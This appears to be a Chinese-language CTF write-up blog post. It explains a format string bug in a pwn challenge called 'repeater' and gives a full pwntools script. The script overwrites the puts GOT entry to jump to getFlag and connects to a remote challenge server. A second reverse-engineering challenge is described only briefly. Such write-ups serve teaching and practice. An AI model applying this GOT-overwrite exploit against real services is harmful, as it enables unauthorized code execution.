PWN – 3


铜牌 – repeater

 

简单的格式化字符串漏洞,任意地址写puts函数的got表地址跳转到getFlag函数,修改number的值为0x2018即可。

脚本如下

 

from pwn import *

elf = ELF("repeater")
#context(arch = "i386",os = "linux",log_level = "debug")

sh = remote("47.105.148.65",9999)
#sh = process("./repeater")

puts_got_addr = 0x0804A01c
getflag_plt_addr = 0x08048616
number_addr = 0x0804a060
number = 0x2018
sh.recvuntil("msg:")
payload = fmtstr_payload(4,{puts_got_addr: getflag_plt_addr,number_addr:number},write_size='short')

sh.sendline(payload)

sh.interactive()

Reverse – 3


file

 

题目描述

出题人有个不好的习惯,总喜欢清除回收站,这次在出题的过程中又把文件给删了,你能帮他还原回来吗?flag无标准格式,提交答案请加上flag{}

 

解题过程

参考官方wp的程序逆向分析,写的比较详细

 

 

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注